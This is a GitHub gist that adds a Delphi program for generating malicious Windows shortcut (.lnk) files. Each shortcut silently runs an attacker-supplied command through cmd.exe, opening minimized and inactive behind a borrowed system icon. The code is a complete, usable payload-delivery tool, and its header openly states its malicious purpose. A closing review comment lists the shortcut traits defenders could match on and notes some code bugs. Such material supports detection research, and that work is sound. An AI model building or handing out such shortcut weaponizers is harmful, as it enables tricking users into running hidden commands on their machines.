
@DarkCoderSc
Last active April 3, 2021 13:21

Revisions

  1. DarkCoderSc renamed this gist May 14, 2018. 1 changed file with 0 additions and 0 deletions.
    File renamed without changes.
  2. DarkCoderSc created this gist May 14, 2018.
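--- a/gistfile1.txt
+++ b/gistfile1.txt
@@ -0,0 +1,72 @@
+{-----------------------------------------------------------------------------------------------------------------------}
+{ PHROZEN SAS (c) 2018 - www.phrozen.io }
+{ Jean-Pierre LESUEUR (jplesueur@phrozen.io) }
+{ }
+{ Create a Windows Shortcut by code and inject a potential malicious single line command, for post extraction and }
+{ execution. }
+{-----------------------------------------------------------------------------------------------------------------------}
+
+program Shortcut_gen;
+
+{$APPTYPE CONSOLE}
+
+uses
+System.SysUtils, ActiveX, ShlObj, ComObj, Windows, Classes;
+
+function MaliciousLnk(cmd, destPath : String) : Boolean;
+var cObject : IUnknown;
+shellLink : IShellLink;
+PFile : IPersistFile;
+begin
+result := false;
+CoInitialize(nil);
+try
+cObject := CreateComObject(CLSID_ShellLink);
+shellLink := cObject as IShellLink;
+PFile := cObject as IPersistFile;
+
+cmd := '/C "' + cmd + '"';
+shellLink.SetDescription('@DarkCoderSc');
+shellLink.SetPath('cmd.exe');
+shellLink.SetArguments(PWideChar(cmd));
+shellLink.SetShowCmd(SW_SHOWMINNOACTIVE);
+shellLink.SetWorkingDirectory('%windir%\system32\');
+shellLink.SetIconLocation('shell32.dll', 1);
+
+result := PFile.Save(PWideChar(destPath), false) = S_OK;
+finally
+CoUninitialize();
+end;
+end;
+
+var Arg1, Arg2 : String;
+strList : TStringList;
+
+begin
+try
+if ParamCount <> 2 then begin
+writeln('usage:');
+writeln('- Arg1 : Payload file, generated with the "gen_shortcut_code.py"');
+writeln('- Arg2 : Full path of destination shortcut');
+
+exit;
+end;
+
+Arg1 := ParamStr(1);
+Arg2 := ParamStr(2);
+
+if NOT FileExists(Arg1) then exit;
+
+// THIS IS JUST A LAZY WORKING EXAMPLE OF OPENNING TEXT FILES
+strList := TStringList.Create;
+strList.LoadFromFile(Arg1);
+
+MaliciousLnk(strList.Text, Arg2);
+
+strList.Free;
+
+finally
+writeln(#13#10 + 'Press enter to leave...');
+readln;
+end;
+end.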
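Review bot: `MaliciousLnk` has no comment recording which shortcut properties it writes, and those properties are what an analyst triaging the resulting .lnk would look at first. From the visible lines the link targets `cmd.exe` with arguments that begin `/C "`, is shown with `SW_SHOWMINNOACTIVE`, takes its icon from `shell32.dll` index 1 and carries the fixed description `@DarkCoderSc`. A short header comment on the function listing these as the fields to inspect in a shortcut parser, or to match on in endpoint telemetry, would make the sample directly usable for detection work. Separately, the main block discards the Boolean returned by `MaliciousLnk` and calls `strList.Free` outside any `try..finally`, so a failed load or save is silent and the list leaks on an exception.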